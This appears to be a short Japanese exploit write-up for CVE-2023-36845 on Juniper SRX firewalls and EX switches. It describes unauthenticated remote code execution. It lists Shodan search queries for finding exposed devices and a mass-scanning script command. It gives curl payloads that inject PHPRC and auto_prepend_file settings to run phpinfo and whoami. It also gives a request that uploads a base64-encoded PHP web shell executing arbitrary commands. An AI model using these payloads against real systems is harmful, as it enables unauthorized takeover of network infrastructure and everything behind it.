
Juniper Firewalls CVE-2023-36845 - リモートコード実行
CVE-2023-36845 は、Juniper SRX ファイアウォールおよび EX スイッチに影響を与える注目すべき PHP 環境変数操作の脆弱性です。Juniper はこの脆弱性を中程度の深刻度と分類していますが、本記事では、この単一の脆弱性をリモートから認証なしでコード実行に悪用する方法を詳しく説明します。
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
検出
python3 CVE-2023-36845.py -f targets.txt -o output.txt
auto_prepend_file と組み合わせて任意のプロトコルラッパーを利用することが可能です。この操作に最も適した選択肢は data:// プロトコルであり、「二次ファイル」をインラインで提供できます。以下は、data:// スキーム内で埋め込まれた <? phpinfo(); ?> を実行する洗練された表現です。
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
whoami コマンドを実行
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
ファイルをアップロード
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| パラメータ | 説明 | 種類 |
|---|---|---|
| --file / -f | 入力ターゲットファイル | ファイル |
| -o | 出力ファイル | ファイル |